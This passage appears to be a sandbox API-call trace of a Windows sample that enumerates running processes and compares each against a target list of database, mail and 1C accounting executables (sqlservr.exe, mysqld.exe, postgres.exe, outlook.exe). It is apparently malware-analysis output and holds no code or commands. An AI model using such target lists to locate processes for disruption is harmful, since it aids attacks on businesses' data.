lpString2="totalcmd.exe") returned -1 [0156.701] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="totalcmd.exe") returned -1 [0156.701] lstrcmpiW (lpString1="mysqld.exe", lpString2="totalcmd.exe") returned -1 [0156.701] lstrcmpiW (lpString1="sqlservr.exe", lpString2="totalcmd.exe") returned -1 [0156.701] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0156.702] lstrlenW (lpString="trillian.exe") returned 12 [0156.702] lstrcmpiW (lpString1="1c8.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="1cv77.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="outlook.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="postgres.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="mysqld.exe", lpString2="trillian.exe") returned -1 [0156.702] lstrcmpiW (lpString1="sqlservr.exe", lpString2="trillian.exe") returned -1 [0156.702] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0156.703] lstrlenW (lpString="webdrive.exe") returned 12 [0156.703] lstrcmpiW (lpString1="1c8.exe", lpString2="webdrive.exe") returned -1 [0156.703] lstrcmpiW (lpString1="1cv77.exe", lpString2="webdrive.exe") returned -1 [0156.703] lstrcmpiW (lpString1="outlook.exe", lpString2="webdrive.exe") returned -1 [0156.703] lstrcmpiW (lpString1="postgres.exe", lpString2="webdrive.exe") returned -1 [0156.703] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="webdrive.exe") returned -1 [0156.703] lstrcmpiW (lpString1="mysqld.exe", lpString2="webdrive.exe") returned -1 [0156.704] lstrcmpiW (lpString1="sqlservr.exe", lpString2="webdrive.exe") returned -1 [0156.704] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0156.705] lstrlenW (lpString="whatsapp.exe") returned 12 [0156.705] lstrcmpiW (lpString1="1c8.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="1cv77.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="outlook.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="postgres.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="mysqld.exe", lpString2="whatsapp.exe") returned -1 [0156.705] lstrcmpiW (lpString1="sqlservr.exe", lpString2="whatsapp.exe") returned -1 [0156.705] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0156.706] lstrlenW (lpString="winscp.exe") returned 10 [0156.706] lstrcmpiW (lpString1="1c8.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="1cv77.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="outlook.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="postgres.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="mysqld.exe", lpString2="winscp.exe") returned -1 [0156.706] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winscp.exe") returned -1 [0156.706] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0156.707] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0156.707] lstrcmpiW (lpString1="1c8.exe", lpString2="yahoomessenger.exe") returned -1 [0156.707] lstrcmpiW (lpString1="1cv77.exe", lpString2="yahoomessenger.exe") returned -1 [0156.707] lstrcmpiW (lpString1="outlook.exe", lpString2="yahoomessenger.exe") returned -1 [0156.708] lstrcmpiW (lpString1="postgres.exe", lpString2="yahoomessenger.exe") returned -1 [0156.708] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="yahoomessenger.exe") returned -1 [0156.708] lstrcmpiW (lpString1="mysqld.exe", lpString2="yahoomessenger.exe") returned -1 [0156.708] lstrcmpiW (lpString1="sqlservr.exe", lpString2="yahoomessenger.exe") returned -1 [0156.708] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0156.709] lstrlenW (lpString="active-charge.exe") returned 17 [0156.709] lstrcmpiW (lpString1="1c8.exe", lpString2="active-charge.exe") returned -1 [0156.709] lstrcmpiW (lpString1="1cv77.exe", lpString2="active-charge.exe") returned -1 [0156.709] lstrcmpiW (lpString1="outlook.exe", lpString2="active-charge.exe") returned 1 [0156.709] lstrcmpiW (lpString1="postgres.exe", lpString2="active-charge.exe") returned 1 [0156.709] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="active-charge.exe") returned 1 [0156.709] lstrcmpiW (lpString1="mysqld.exe", lpString2="active-charge.exe") returned 1 [0156.709] lstrcmpiW (lpString1="sqlservr.exe", lpString2="active-charge.exe") returned 1 [0156.709] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0156.710] lstrlenW (lpString="accupos.exe") returned 11 [0156.710] lstrcmpiW (lpString1="1c8.exe", lpString2="accupos.exe") returned -1 [0156.710] lstrcmpiW (lpString1="1cv77.exe", lpString2="accupos.exe") returned -1 [0156.710] lstrcmpiW (lpString1="outlook.exe", lpString2="accupos.exe") returned 1 [0156.710] lstrcmpiW (lpString1="postgres.exe", lpString2="accupos.exe") returned 1 [0156.710] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="accupos.exe") returned 1 [0156.710] lstrcmpiW (lpString1="mysqld.exe", lpString2="accupos.exe") returned 1 [0156.710] lstrcmpiW (lpString1="sqlservr.exe", lpString2="accupos.exe") returned 1 [0156.710] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0156.712] lstrlenW (lpString="afr38.exe") returned 9 [0156.712] lstrcmpiW (lpString1="1c8.exe", lpString2="afr38.exe") returned -1 [0156.712] lstrcmpiW (lpString1="1cv77.exe", lpString2="afr38.exe") returned -1 [0156.712] lstrcmpiW (lpString1="outlook.exe", lpString2="afr38.exe") returned 1 [0156.712] lstrcmpiW (lpString1="postgres.exe", lpString2="afr38.exe") returned 1 [0156.712] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="afr38.exe") returned 1 [0156.712] lstrcmpiW (lpString1="mysqld.exe", lpString2="afr38.exe") returned 1 [0156.712] lstrcmpiW (lpString1="sqlservr.exe", lpString2="afr38.exe") returned 1 [0156.712] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0156.713] lstrlenW (lpString="aldelo.exe") returned 10 [0156.713] lstrcmpiW (lpString1="1c8.exe", lpString2="aldelo.exe") returned -1 [0156.713] lstrcmpiW (lpString1="1cv77.exe", lpString2="aldelo.exe") returned -1 [0156.713] lstrcmpiW (lpString1="outlook.exe", lpString2="aldelo.exe") returned 1 [0156.713] lstrcmpiW (lpString1="postgres.exe", lpString2="aldelo.exe") returned 1 [0156.713] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="aldelo.exe") returned 1 [0156.713] lstrcmpiW (lpString1="mysqld.exe", lpString2="aldelo.exe") returned 1 [0156.713] lstrcmpiW (lpString1="sqlservr.exe", lpString2="aldelo.exe") returned 1 [0156.713] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0156.714] lstrlenW (lpString="ccv_server.exe") returned 14 [0156.714] lstrcmpiW (lpString1="1c8.exe", lpString2="ccv_server.exe") returned -1 [0156.714] lstrcmpiW (lpString1="1cv77.exe", lpString2="ccv_server.exe") returned -1 [0156.714] lstrcmpiW (lpString1="outlook.exe", lpString2="ccv_server.exe") returned 1 [0156.714] lstrcmpiW (lpString1="postgres.exe", lpString2="ccv_server.exe") returned 1 [0156.714] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="ccv_server.exe") returned 1 [0156.714] lstrcmpiW (lpString1="mysqld.exe", lpString2="ccv_server.exe") returned 1 [0156.714] lstrcmpiW (lpString1="sqlservr.exe", lpString2="ccv_server.exe") returned 1 [0156.714] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0156.715] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0156.716] lstrcmpiW (lpString1="1c8.exe", lpString2="centralcreditcard.exe") returned -1 [0156.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="centralcreditcard.exe") returned -1 [0156.716] lstrcmpiW (lpString1="outlook.exe", lpString2="centralcreditcard.exe") returned 1 [0156.716] lstrcmpiW (lpString1="postgres.exe", lpString2="centralcreditcard.exe") returned 1 [0156.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="centralcreditcard.exe") returned 1 [0156.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="centralcreditcard.exe") returned 1 [0156.716] lstrcmpiW (lpString1="sqlservr.exe", lpString2="centralcreditcard.exe") returned 1 [0156.716] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0156.717] lstrlenW (lpString="creditservice.exe") returned 17 [0156.717] lstrcmpiW (lpString1="1c8.exe", lpString2="creditservice.exe") returned -1 [0156.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="creditservice.exe") returned -1 [0156.717] lstrcmpiW (lpString1="outlook.exe", lpString2="creditservice.exe") returned 1 [0156.717] lstrcmpiW (lpString1="postgres.exe", lpString2="creditservice.exe") returned 1 [0156.717] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="creditservice.exe") returned 1 [0156.717] lstrcmpiW (lpString1="mysqld.exe", lpString2="creditservice.exe") returned 1 [0156.717] lstrcmpiW (lpString1="sqlservr.exe", lpString2="creditservice.exe") returned 1 [0156.717] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0156.718] lstrlenW (lpString="edcsvr.exe") returned 10 [0156.718] lstrcmpiW (lpString1="1c8.exe", lpString2="edcsvr.exe") returned -1 [0156.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="edcsvr.exe") returned -1 [0156.718] lstrcmpiW (lpString1="outlook.exe", lpString2="edcsvr.exe") returned 1 [0156.718] lstrcmpiW (lpString1="postgres.exe", lpString2="edcsvr.exe") returned 1 [0156.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="edcsvr.exe") returned 1 [0156.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="edcsvr.exe") returned 1 [0156.718] lstrcmpiW (lpString1="sqlservr.exe", lpString2="edcsvr.exe") returned 1 [0156.718] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0156.719] lstrlenW (lpString="fpos.exe") returned 8 [0156.719] lstrcmpiW (lpString1="1c8.exe", lpString2="fpos.exe") returned -1 [0156.719] lstrcmpiW (lpString1="1cv77.exe", lpString2="fpos.exe") returned -1 [0156.719] lstrcmpiW (lpString1="outlook.exe", lpString2="fpos.exe") returned 1 [0156.719] lstrcmpiW (lpString1="postgres.exe", lpString2="fpos.exe") returned 1 [0156.719] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="fpos.exe") returned 1 [0156.720] lstrcmpiW (lpString1="mysqld.exe", lpString2="fpos.exe") returned 1 [0156.720] lstrcmpiW (lpString1="sqlservr.exe", lpString2="fpos.exe") returned 1 [0156.720] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0156.720] lstrlenW (lpString="isspos.exe") returned 10 [0156.721] lstrcmpiW (lpString1="1c8.exe", lpString2="isspos.exe") returned -1 [0156.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="isspos.exe") returned -1 [0156.721] lstrcmpiW (lpString1="outlook.exe", lpString2="isspos.exe") returned 1 [0156.721] lstrcmpiW (lpString1="postgres.exe", lpString2="isspos.exe") returned 1 [0156.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="isspos.exe") returned 1 [0156.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="isspos.exe") returned 1 [0156.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="isspos.exe") returned 1 [0156.721] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0156.722] lstrlenW (lpString="mxslipstream.exe") returned 16 [0156.722] lstrcmpiW (lpString1="1c8.exe", lpString2="mxslipstream.exe") returned -1 [0156.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="mxslipstream.exe") returned -1 [0156.722] lstrcmpiW (lpString1="outlook.exe", lpString2="mxslipstream.exe") returned 1 [0156.722] lstrcmpiW (lpString1="postgres.exe", lpString2="mxslipstream.exe") returned 1 [0156.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="mxslipstream.exe") returned 1 [0156.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="mxslipstream.exe") returned 1 [0156.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="mxslipstream.exe") returned 1 [0156.722] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0156.723] lstrlenW (lpString="omnipos.exe") returned 11 [0156.723] lstrcmpiW (lpString1="1c8.exe", lpString2="omnipos.exe") returned -1 [0156.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="omnipos.exe") returned -1 [0156.723] lstrcmpiW (lpString1="outlook.exe", lpString2="omnipos.exe") returned 1 [0156.723] lstrcmpiW (lpString1="postgres.exe", lpString2="omnipos.exe") returned 1 [0156.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="omnipos.exe") returned -1 [0156.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="omnipos.exe") returned -1 [0156.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="omnipos.exe") returned 1 [0156.723] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0156.739] lstrlenW (lpString="spcwin.exe") returned 10 [0156.739] lstrcmpiW (lpString1="1c8.exe", lpString2="spcwin.exe") returned -1 [0156.739] lstrcmpiW (lpString1="1cv77.exe", lpString2="spcwin.exe") returned -1 [0156.740] lstrcmpiW (lpString1="outlook.exe", lpString2="spcwin.exe") returned -1 [0156.740] lstrcmpiW (lpString1="postgres.exe", lpString2="spcwin.exe") returned -1 [0156.740] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="spcwin.exe") returned -1 [0156.740] lstrcmpiW (lpString1="mysqld.exe", lpString2="spcwin.exe") returned -1 [0156.740] lstrcmpiW (lpString1="sqlservr.exe", lpString2="spcwin.exe") returned 1 [0156.740] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0156.741] lstrlenW (lpString="spgagentservice.exe") returned 19 [0156.741] lstrcmpiW (lpString1="1c8.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="1cv77.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="outlook.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="postgres.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="mysqld.exe", lpString2="spgagentservice.exe") returned -1 [0156.741] lstrcmpiW (lpString1="sqlservr.exe", lpString2="spgagentservice.exe") returned 1 [0156.741] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0156.742] lstrlenW (lpString="utg2.exe") returned 8 [0156.742] lstrcmpiW (lpString1="1c8.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="1cv77.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="outlook.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="postgres.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="mysqld.exe", lpString2="utg2.exe") returned -1 [0156.742] lstrcmpiW (lpString1="sqlservr.exe", lpString2="utg2.exe") returned -1 [0156.742] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0156.743] lstrlenW (lpString="lb_community.exe") returned 16 [0156.743] lstrcmpiW (lpString1="1c8.exe", lpString2="lb_community.exe") returned -1 [0156.743] lstrcmpiW (lpString1="1cv77.exe", lpString2="lb_community.exe") returned -1 [0156.743] lstrcmpiW (lpString1="outlook.exe", lpString2="lb_community.exe") returned 1 [0156.743] lstrcmpiW (lpString1="postgres.exe", lpString2="lb_community.exe") returned 1 [0156.743] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lb_community.exe") returned 1 [0156.743] lstrcmpiW (lpString1="mysqld.exe", lpString2="lb_community.exe") returned 1 [0156.743] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lb_community.exe") returned 1 [0156.743] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0156.744] lstrlenW (lpString="miniature.exe") returned 13 [0156.744] lstrcmpiW (lpString1="1c8.exe", lpString2="miniature.exe") returned -1 [0156.744] lstrcmpiW (lpString1="1cv77.exe", lpString2="miniature.exe") returned -1 [0156.744] lstrcmpiW (lpString1="outlook.exe", lpString2="miniature.exe") returned 1 [0156.744] lstrcmpiW (lpString1="postgres.exe", lpString2="miniature.exe") returned 1 [0156.744] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="miniature.exe") returned 1 [0156.744] lstrcmpiW (lpString1="mysqld.exe", lpString2="miniature.exe") returned 1 [0156.744] lstrcmpiW (lpString1="sqlservr.exe", lpString2="miniature.exe") returned 1 [0156.744] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0156.745] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0156.745] lstrcmpiW (lpString1="1c8.exe", lpString2="humanity-volumes-enables.exe") returned -1 [0156.745] lstrcmpiW (lpString1="1cv77.exe", lpString2="humanity-volumes-enables.exe") returned -1 [0156.745] lstrcmpiW (lpString1="outlook.exe", lpString2="humanity-volumes-enables.exe") returned 1 [0156.746] lstrcmpiW (lpString1="postgres.exe", lpString2="humanity-volumes-enables.exe") returned 1 [0156.746] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="humanity-volumes-enables.exe") returned 1 [0156.746] lstrcmpiW (lpString1="mysqld.exe", lpString2="humanity-volumes-enables.exe") returned 1 [0156.746] lstrcmpiW (lpString1="sqlservr.exe", lpString2="humanity-volumes-enables.exe") returned 1 [0156.746] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0156.747] lstrlenW (lpString="operation-environments.exe") returned 26 [0156.747] lstrcmpiW (lpString1="1c8.exe", lpString2="operation-environments.exe") returned -1 [0156.747] lstrcmpiW (lpString1="1cv77.exe", lpString2="operation-environments.exe") returned -1 [0156.747] lstrcmpiW (lpString1="outlook.exe", lpString2="operation-environments.exe") returned 1 [0156.747] lstrcmpiW (lpString1="postgres.exe", lpString2="operation-environments.exe") returned 1 [0156.747] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="operation-environments.exe") returned -1 [0156.747] lstrcmpiW (lpString1="mysqld.exe", lpString2="operation-environments.exe") returned -1 [0156.747] lstrcmpiW (lpString1="sqlservr.exe", lpString2="operation-environments.exe") returned 1 [0156.747] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.748] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0156.748] lstrcmpiW (lpString1="1c8.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="1cv77.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="outlook.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="postgres.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="mysqld.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] lstrcmpiW (lpString1="sqlservr.exe", lpString2="WmiPrvSE.exe") returned -1 [0156.748] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.749] lstrlenW (lpString="taskhostw.exe") returned 13 [0156.749] lstrcmpiW (lpString1="1c8.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="1cv77.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="outlook.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="postgres.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="mysqld.exe", lpString2="taskhostw.exe") returned -1 [0156.749] lstrcmpiW (lpString1="sqlservr.exe", lpString2="taskhostw.exe") returned -1 [0156.749] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0156.750] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0156.750] lstrcmpiW (lpString1="1c8.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="1cv77.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="outlook.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="postgres.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="mysqld.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] lstrcmpiW (lpString1="sqlservr.exe", lpString2="UNPCampaignManager.exe") returned -1 [0156.750] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0156.751] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0156.751] lstrcmpiW (lpString1="1c8.exe", lpString2="DeviceCensus.exe") returned -1 [0156.751] lstrcmpiW (lpString1="1cv77.exe", lpString2="DeviceCensus.exe") returned -1 